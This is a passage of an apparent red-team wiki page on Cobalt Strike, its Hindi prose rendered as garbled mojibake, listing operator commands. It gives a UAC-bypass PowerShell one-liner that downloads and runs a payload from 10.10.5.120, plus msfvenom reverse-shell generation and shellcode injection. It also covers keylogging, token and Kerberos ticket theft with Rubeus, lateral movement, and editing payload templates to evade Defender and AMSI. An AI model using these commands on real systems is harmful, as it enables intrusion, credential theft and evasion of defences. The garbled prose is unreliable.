Hindi - Ht

Cobalt Strike

рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛

рд╕реА2 рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛

Cobalt Strike -> рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛ -> рдЬреЛрдбрд╝реЗрдВ/рд╕рдВрдкрд╛рджрд┐рдд рдХрд░реЗрдВ рдлрд┐рд░ рдЖрдк рдХрд╣рд╛рдВ рд╕реБрдирдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдХрд┐рд╕ рдкреНрд░рдХрд╛рд░ рдХреЗ рдмреАрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ (http, dns, smb...) рдФрд░ рдЕрдзрд┐рдХ рдХрд╛ рдЪрдпрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдкреАрдпрд░2рдкреАрдпрд░ рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛

рдЗрди рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛рдУрдВ рдХреЗ рдмреАрдХрдиреЛрдВ рдХреЛ рд╕реА2 рдХреЗ рд╕рд╛рде рд╕реАрдзреЗ рдмрд╛рддрдЪреАрдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реЛрддреА рд╣реИ, рд╡реЗ рдЗрд╕рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЗрд╕рд╕реЗ рд╕рдВрд╡рд╛рдж рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

Cobalt Strike -> рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛ -> рдЬреЛрдбрд╝реЗрдВ/рд╕рдВрдкрд╛рджрд┐рдд рдХрд░реЗрдВ рдлрд┐рд░ рдЖрдкрдХреЛ TCP рдпрд╛ SMB рдмреАрдХрди рдХрд╛ рдЪрдпрди рдХрд░рдирд╛ рд╣реЛрдЧрд╛

  • TCP рдмреАрдХрди рдЪрдпрдирд┐рдд рдкреЛрд░реНрдЯ рдореЗрдВ рдПрдХ рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛ рд╕реЗрдЯ рдХрд░реЗрдЧрд╛ред рдПрдХ TCP рдмреАрдХрди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рджреВрд╕рд░реЗ рдмреАрдХрди рд╕реЗ connect <ip> <port> рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ

  • smb рдмреАрдХрди рдЪрдпрдирд┐рдд рдирд╛рдо рдХреЗ рдкрд╛рдЗрдкрдореЗрдВ рд╕реБрдиреЗрдЧрд╛ред SMB рдмреАрдХрди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЛ link [target] [pipe] рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред

рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ рдФрд░ рд╣реЛрд╕реНрдЯ рдХрд░реЗрдВ

рдлрд╝рд╛рдЗрд▓реЛрдВ рдореЗрдВ рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ

рд╣рдорд▓реЗ -> рдкреИрдХреЗрдЬ ->

  • HTMLApplication HTA рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рд▓рд┐рдП

  • MS Office Macro рдореИрдХреНрд░реЛ рдХреЗ рд╕рд╛рде рдПрдХ рдСрдлрд╝рд┐рд╕ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдХреЗ рд▓рд┐рдП

  • Windows Executable .exe, .dll рдпрд╛ рд╕реЗрд╡рд╛ .exe рдХреЗ рд▓рд┐рдП

  • Windows Executable (S) рдПрдХ stageless .exe, .dll рдпрд╛ рд╕реЗрд╡рд╛ .exe рдХреЗ рд▓рд┐рдП (рд╕реНрдЯреЗрдЬрд▓реЗрд╕ рд╕реНрдЯреЗрдЬреНрдб рд╕реЗ рдмреЗрд╣рддрд░ рд╣реИ, рдХрдо IoC)

рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ рдФрд░ рд╣реЛрд╕реНрдЯ рдХрд░реЗрдВ

рд╣рдорд▓реЗ -> рд╡реЗрдм рдбреНрд░рд╛рдЗрд╡-рдмрд╛рдИ -> рд╕реНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд╡реЗрдм рд╡рд┐рддрд░рдг (S) рдЗрд╕рд╕реЗ рдПрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ/рдПрдХреНрд╕реАрдХреНрдпреВрдЯреЗрдмрд▓ рдЙрддреНрдкрдиреНрди рд╣реЛрдЧрд╛ рдЬреЛ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рд╕реЗ рдмреАрдХрди рдХреЛ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╣реЛрдЧрд╛, рдЬреИрд╕реЗ: bitsadmin, exe, powershell рдФрд░ python

рдкреЗрд▓реЛрдб рд╣реЛрд╕реНрдЯ рдХрд░реЗрдВ

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдкреЗрд╢ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡реЗрдм рд╕рд░реНрд╡рд░ рдореЗрдВ рд░рдЦрдиреЗ рдХреА рдлрд╝рд╛рдЗрд▓ рд╣реИ, рддреЛ рдХреЗрд╡рд▓ рд╣рдорд▓реЗ -> рд╡реЗрдм рдбреНрд░рд╛рдЗрд╡-рдмрд╛рдИ -> рдлрд╝рд╛рдЗрд▓ рд╣реЛрд╕реНрдЯ рдкрд░ рдЬрд╛рдПрдВ рдФрд░ рд╣реЛрд╕реНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдЪрдпрди рдХрд░реЗрдВ рдФрд░ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХрд░реЗрдВред

рдмреАрдХрди рд╡рд┐рдХрд▓реНрдк

# рд╕реНрдерд╛рдиреАрдп .NET рдмрд╛рдЗрдирд░реА рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
execute-assembly </path/to/executable.exe>

# рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ
printscreen    # рдкреНрд░рд┐рдВрдЯрд╕реНрдХреНрд░реАрди рд╡рд┐рдзрд┐ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХрд▓ рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рд▓реЗрдВ
screenshot     # рдПрдХрд▓ рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рд▓реЗрдВ
screenwatch    # рдбреЗрд╕реНрдХрдЯреЙрдк рдХреЗ рдирд┐рдпрдорд┐рдд рдЕрдВрддрд░рд╛рд▓ рдкрд░ рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рд▓реЗрдВ
## рдЙрдиреНрд╣реЗрдВ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рд╡реНрдпреВ -> рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рдкрд░ рдЬрд╛рдПрдВ

# рдХреАрд▓реЙрдЧрд░
keylogger [pid] [x86|x64]
## рдХреБрдВрдЬреАрд╕реНрдкрд░реНрд╢ рдХреЛ рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рд╡реНрдпреВ > рдХреАрд╕реНрдЯреНрд░реЛрдХреНрд╕ рдкрд░ рдЬрд╛рдПрдВ

# рдкреЛрд░реНрдЯрд╕реНрдХреИрди
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # рджреВрд╕рд░реЗ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдкреЛрд░реНрдЯрд╕реНрдХреИрди рдХреНрд░рд┐рдпрд╛ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░реЗрдВ
portscan [targets] [ports] [arp|icmp|none] [max connections]

# рдкрд╛рд╡рд░рд╢реЗрд▓
# рдкрд╛рд╡рд░рд╢реЗрд▓ рдореЙрдбреНрдпреВрд▓ рдЖрдпрд╛рдд рдХрд░реЗрдВ
powershell-import C:\path\to\PowerView.ps1
powershell <рдпрд╣рд╛рдВ рдкрд╛рд╡рд░рд╢реЗрд▓ рдХрдорд╛рдВрдб рд▓рд┐рдЦреЗрдВ>

# рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдиреБрдХрд░рдг
## рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХреЗ рд╕рд╛рде рдЯреЛрдХрди рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ
make_token [DOMAIN\user] [password] # рдиреЗрдЯрд╡рд░реНрдХ рдореЗрдВ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдЕрдиреБрдХрд░рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЯреЛрдХрди рдмрдирд╛рдПрдВ
ls \\computer_name\c$ # рдПрдХ рдХрдВрдкреНрдпреВрдЯрд░ рдореЗрдВ C$ рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдЙрддреНрдкрдиреНрди рдЯреЛрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ
rev2self # make_token рдХреЗ рд╕рд╛рде рдЙрддреНрдкрдиреНрди рдЯреЛрдХрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдмрдВрдж рдХрд░реЗрдВ
## make_token рдХрд╛ рдЙрдкрдпреЛрдЧ рдИрд╡реЗрдВрдЯ 4624 рдЙрддреНрдкрдиреНрди рдХрд░рддрд╛ рд╣реИ: рдПрдХ рдЦрд╛рддрд╛ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рд▓реЙрдЧ рдСрди рд╣реБрдЖ рдерд╛ред рдпрд╣ рдИрд╡реЗрдВрдЯ рд╡рд┐рдВрдбреЛрдЬ рдбреЛрдореЗрди рдореЗрдВ рдмрд╣реБрдд рд╕рд╛рдорд╛рдиреНрдп рд╣реИ, рд▓реЗрдХрд┐рди рд▓реЙрдЧрдСрди рдкреНрд░рдХрд╛рд░ рдкрд░ рдлрд╝рд┐рд▓реНрдЯрд░ рдХрд░рдХреЗ рдЗрд╕реЗ рд╕рдВрдХреНрд╖реЗрдк рдореЗрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдЬреИрд╕рд╛ рдХрд┐ рдкрд╣рд▓реЗ рдХрд╣рд╛ рдЧрдпрд╛ рд╣реИ, рдЗрд╕рдореЗрдВ LOGON32_LOGON_NEW_CREDENTIALS рдХрд╛ рдЙрдкрдпреЛрдЧ рд╣реЛрддрд╛ рд╣реИ рдЬреЛ рдкреНрд░рдХрд╛рд░ 9 рд╣реИред

# UAC рдмрд╛рдИрдкрд╛рд╕
elevate svc-exe <рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛>
elevate uac-token-duplication <рд╕реБрдирд╡рд╛рдИрдХрд░реНрддрд╛>
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

## рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдЯреЛрдХрди рдЪреБрд░рд╛ рд▓реЗрдВ
## make_token рдХреА рддрд░рд╣, рд▓реЗрдХрд┐рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ
## SYSTEM рд╕реЗ рдЯрд┐рдХрдЯ рдкрд╛рд╕ рдХрд░реЗрдВ
## рдЯрд┐рдХрдЯ рдХреЗ рд╕рд╛рде рдПрдХ рдирдпрд╛ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ
execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## рдЙрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдЯреЛрдХрди рдЪреБрд░рд╛рдПрдВ
steal_token <pid>

## рдЯрд┐рдХрдЯ + рдЯрд┐рдХрдЯ рдкрд╛рд╕ рдирд┐рдХрд╛рд▓реЗрдВ
### рдЯрд┐рдХрдЯ рд╕реВрдЪреА рдмрдирд╛рдПрдВ
execute-assembly C:\path\Rubeus.exe triage
### luid рджреНрд╡рд╛рд░рд╛ рджрд┐рд▓рдЪрд╕реНрдк рдЯрд┐рдХрдЯ рдбрдВрдк рдХрд░реЗрдВ
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
### рдирдИ рд▓реЙрдЧрдСрди рд╕рддреНрд░ рдмрдирд╛рдПрдВ, luid рдФрд░ processid рдХрд╛ рдзреНрдпрд╛рди рд░рдЦреЗрдВ
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### рдЙрддреНрдкрдиреНрди рд▓реЙрдЧрдСрди рд╕рддреНрд░ рдореЗрдВ рдЯрд┐рдХрдЯ рдбрд╛рд▓реЗрдВ
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### рдЕрдВрдд рдореЗрдВ, рдЙрд╕ рдирдИ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕реЗ рдЯреЛрдХрди рдЪреБрд░рд╛рдПрдВ
steal_token <pid>

# рд▓реИрдЯрд░рд▓ рдореВрд╡рдореЗрдВрдЯ
## рдпрджрд┐ рдЯреЛрдХрди рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ рддреЛ рдЙрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛
jump [method] [target] [listener]
## рд╡рд┐рдзрд┐рдпрд╛рдБ:
## psexec                    x86   рд╕реЗрд╡рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╕реЗрд╡рд╛ EXE рдЖрд░реНрдЯрд┐рдлреИрдХреНрдЯ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП
## psexec64                  x64   рд╕реЗрд╡рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╕реЗрд╡рд╛ EXE рдЖрд░реНрдЯрд┐рдлреИрдХреНрдЯ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП
##┬аpsexec_psh                x86   рд╕реЗрд╡рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ PowerShell рд╡рди-рд▓рд╛рдЗрдирд░ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП
##┬аwinrm                     x86   WinRM рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ PowerShell рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рд╛рдПрдВ
##┬аwinrm64                   x64   WinRM рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ PowerShell рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рд╛рдПрдВ

remote-exec [method] [target] [command]
## рд╡рд┐рдзрд┐рдпрд╛рдБ:
##┬аpsexec                          рд╕реЗрд╡рд╛ рдирд┐рдпрдВрддреНрд░рдг рдкреНрд░рдмрдВрдзрдХ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд░рд┐рдореЛрдЯ рдПрдХреНрдЬреАрдХреНрдпреВрдЯ рдХрд░реЗрдВ
##┬аwinrm                           WinRM рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд░рд┐рдореЛрдЯ рдПрдХреНрдЬреАрдХреНрдпреВрдЯ рдХрд░реЗрдВ (PowerShell)
##┬аwmi                             WMI рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд░рд┐рдореЛрдЯ рдПрдХреНрдЬреАрдХреНрдпреВрдЯ рдХрд░реЗрдВ

## WMI рдХреЗ рд╕рд╛рде рдПрдХ рдмреАрдХрди рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП (рдпрд╣ рдЬрдВрдк рдХрдорд╛рдВрдб рдореЗрдВ рдирд╣реАрдВ рд╣реИ) рдмрд╕ рдмреАрдХрди рдЕрдкрд▓реЛрдб рдХрд░реЗрдВ рдФрд░ рдЗрд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВ
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe


# Metasploit рдХреЛ рд╕рддреНрд░ рдкрд╛рд╕ рдХрд░реЗрдВ - рд▓рд┐рд╕реНрдЯрдирд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ
## Metaploit рд╣реЛрд╕реНрдЯ рдкрд░
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j

## Cobalt рдкрд░: Listeners > Add рдФрд░ Payload рдХреЛ Foreign HTTP рдкрд░ рд╕реЗрдЯ рдХрд░реЗрдВред Host рдХреЛ 10.10.5.120, Port рдХреЛ 8080 рд╕реЗрдЯ рдХрд░реЗрдВ рдФрд░ Save рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред
beacon> spawn metasploit
## рдЖрдк рдХреЗрд╡рд▓ рд╡рд┐рджреЗрд╢реА рд▓рд┐рд╕реНрдЯрдирд░ рдХреЗ рд╕рд╛рде x86 Meterpreter рд╕рддреНрд░ рдЙрддреНрдкрдиреНрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

# Metasploit рд╕рддреНрд░ рдХреЛ cobalt strike рдХреЛ рдкрд╛рд╕ рдХрд░реЗрдВ - рд╢реЗрд▓рдХреЛрдб рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ
## Metasploit рд╣реЛрд╕реНрдЯ рдкрд░
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
## msfvenom рдЪрд▓рд╛рдПрдВ рдФрд░ multi/handler рд▓рд┐рд╕реНрдЯрдирд░ рдХреЛ рддреИрдпрд╛рд░ рдХрд░реЗрдВ

## рдмрд┐рди рдлрд╝рд╛рдЗрд▓ рдХреЛ cobalt strike рд╣реЛрд╕реНрдЯ рдореЗрдВ рдХреЙрдкреА рдХрд░реЗрдВ
ps
shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process

# Metasploit рд╕рддреНрд░ рдХреЛ cobalt strike рдХреЛ рдкрд╛рд╕ рдХрд░реЗрдВ
## рдирд┐рд░реНрдорд┐рдд Beacon рд╢реЗрд▓рдХреЛрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ, Attacks > Packages > Windows Executable (S) рдкрд░ рдЬрд╛рдПрдВ, рд╡рд╛рдВрдЫрд┐рдд рд▓рд┐рд╕реНрдЯрдирд░ рдХрд╛ рдЪрдпрди рдХрд░реЗрдВ, рдЖрдЙрдЯрдкреБрдЯ рдкреНрд░рдХрд╛рд░ рдХреЗ рд░реВрдк рдореЗрдВ Raw рдХрд╛ рдЪрдпрди рдХрд░реЗрдВ рдФрд░ Use x64 payload рдХрд╛ рдЪрдпрди рдХрд░реЗрдВред
## Metasploit рдореЗрдВ post/windows/manage/shellcode_inject рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рдЬрд┐рд╕рд╕реЗ рдЙрддреНрдкрдиреНрди рдХрд┐рдпрд╛ рдЧрдпрд╛ cobalt srike shellcode рдЗрдВрдЬреЗрдХреНрдЯ рд╣реЛрддрд╛ рд╣реИ


# рдкрд┐рд╡рдЯрд┐рдВрдЧ
## рдЯреАрдорд╕рд░реНрд╡рд░ рдореЗрдВ рдПрдХ рд╕реЙрдХреНрд╕ рдкреНрд░реЙрдХреНрд╕реА рдЦреЛрд▓реЗрдВ
beacon> socks 1080

# SSH рдХрдиреЗрдХреНрд╢рди
beacon> ssh 10.10.17.12:22 username password

AVs рд╕реЗ рдмрдЪреЗрдВ

Artifact Kit

рдЖрдорддреМрд░ рдкрд░ /opt/cobaltstrike/artifact-kit рдореЗрдВ рдЖрдкрдХреЛ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рджреНрд╡рд╛рд░рд╛ рдЙрддреНрдкрдиреНрди рдмрд╛рдЗрдирд░реА рдмреАрдХрди рдХреЗ рдХреЛрдб рдФрд░ рдкреВрд░реНрд╡-рд╕рдВрдХрд▓рд┐рдд рдЯреЗрдореНрдкрд▓реЗрдЯ (/src-common рдореЗрдВ) рдорд┐рд▓реЗрдВрдЧреЗред

ThreatCheck рдХрд╛ рдЙрдкрдпреЛрдЧ рдЙрддреНрдкрдиреНрди рдмреИрдХрдбреЛрд░ (рдпрд╛ рдХреЗрд╡рд▓ рдХрдВрдкрд╛рдЗрд▓ рдХрд┐рдП рдЧрдП рдЯреЗрдореНрдкрд▓реЗрдЯ) рдХреЗ рд╕рд╛рде рдХрд░рдХреЗ рдЖрдк рдпрд╣ рдЬрд╛рдВрдЪ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдбрд┐рдлреЗрдВрдбрд░ рдХреЛ рдХреНрдпрд╛ рдЯреНрд░рд┐рдЧрд░ рдХрд░ рд░рд╣рд╛ рд╣реИред рдЖрдорддреМрд░ рдкрд░ рдпрд╣ рдПрдХ рд╕реНрдЯреНрд░рд┐рдВрдЧ рд╣реЛрддреА рд╣реИред рдЗрд╕рд▓рд┐рдП рдЖрдк рдмреИрдХрдбреЛрд░ рдЙрддреНрдкрдиреНрди рдХрд░ рд░рд╣реЗ рдХреЛрдб рдореЗрдВ рдЙрд╕ рд╕реНрдЯреНрд░рд┐рдВрдЧ рдХреЛ рдирд╣реАрдВ рджрд┐рдЦрдиреЗ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдХреЛрдб рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж рдЙрд╕реА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реЗ ./build.sh рдЪрд▓рд╛рдПрдВ рдФрд░ dist-pipe/ рдлрд╝реЛрд▓реНрдбрд░ рдХреЛ Windows рдХреНрд▓рд╛рдЗрдВрдЯ рдореЗрдВ C:\Tools\cobaltstrike\ArtifactKit рдореЗрдВ рдХреЙрдкреА рдХрд░реЗрдВред

pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .

рдпрд╣ рди рднреВрд▓реЗрдВ рдХрд┐ рдЖрдкрдХреЛ рд╡рд┐рдирд╛рд╢рдХрд╛рд░реА рд╕реНрдХреНрд░рд┐рдкреНрдЯ dist-pipe\artifact.cna рд▓реЛрдб рдХрд░рдирд╛ рд╣реЛрдЧрд╛ рддрд╛рдХрд┐ Cobalt Strike рдХреЛ рд╣рдорд╛рд░реЗ рджреНрд╡рд╛рд░рд╛ рдЪрдпрдирд┐рдд рдбрд┐рд╕реНрдХ рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдирд╣реАрдВ рдХрд░рдирд╛ рдкрдбрд╝реЗред

рд╕рдВрд╕рд╛рдзрди рдХрд┐рдЯ

рд╕рдВрд╕рд╛рдзрди рдХрд┐рдЯ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ Cobalt Strike рдХреЗ рд╕реНрдХреНрд░рд┐рдкреНрдЯ-рдЖрдзрд╛рд░рд┐рдд рдкреЗрд▓реЛрдб рдХреЗ рдЯреЗрдореНрдкрд▓реЗрдЯ рд╣реЛрддреЗ рд╣реИрдВ, рдЬрд┐рдирдореЗрдВ PowerShell, VBA рдФрд░ HTA рд╢рд╛рдорд┐рд▓ рд╣реИрдВред

рдЯреЗрдореНрдкрд▓реЗрдЯ рдХреЗ рд╕рд╛рде ThreatCheck рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЖрдк рдпрд╣ рдЬрд╛рди рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдбрд┐рдлрд╝реЗрдВрдбрд░ (рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ AMSI) рдХреЛ рдХреНрдпрд╛ рдкрд╕рдВрдж рдирд╣реАрдВ рд╣реИ рдФрд░ рдЙрд╕реЗ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1

рдбрд┐рдЯреЗрдХреНрдЯ рдХреА рдЧрдИ рд▓рд╛рдЗрдиреЛрдВ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдХреЗ рдПрдХ рдЯреЗрдореНрдкрд▓реЗрдЯ рдмрдирд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдЬреЛ рдкрдХрдбрд╝рд╛ рдирд╣реАрдВ рдЬрд╛рдПрдЧрд╛ред

рдпрд╛рдж рд░рдЦреЗрдВ рдХрд┐ рдЖрдкрдХреЛ рдПрдЧреНрд░реЗрд╕рд┐рд╡ рд╕реНрдХреНрд░рд┐рдкреНрдЯ ResourceKit\resources.cna рд▓реЛрдб рдХрд░рдирд╛ рдирд╣реАрдВ рднреВрд▓рдирд╛ рдЪрд╛рд╣рд┐рдП рддрд╛рдХрд┐ рдХреЛрдмрд╛рд▓реНрдЯ рд╕реНрдЯреНрд░рд╛рдЗрдХ рдХреЛ рдмрддрд╛рдпрд╛ рдЬрд╛ рд╕рдХреЗ рдХрд┐ рд╣рдореЗрдВ рдбрд┐рд╕реНрдХ рд╕реЗ рд░рд┐рд╕реЛрд░реНрд╕реЗрдЬрд╝ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рд╣реИ рдФрд░ рди рдХрд┐ рд▓реЛрдб рдХрд┐рдП рдЧрдП рд░рд┐рд╕реЛрд░реНрд╕реЗрдЬрд╝ред

cd C:\Tools\neo4j\bin
neo4j.bat console
http://localhost:7474/ --> Change password
execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d DOMAIN.LOCAL



# Change powershell
C:\Tools\cobaltstrike\ResourceKit
template.x64.ps1
# Change $var_code -> $polop
# $x --> $ar
cobalt strike --> script manager --> Load --> Cargar C:\Tools\cobaltstrike\ResourceKit\resources.cna

#artifact kit
cd  C:\Tools\cobaltstrike\ArtifactKit
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
PreviousICMPshNextOther Big References

Last updated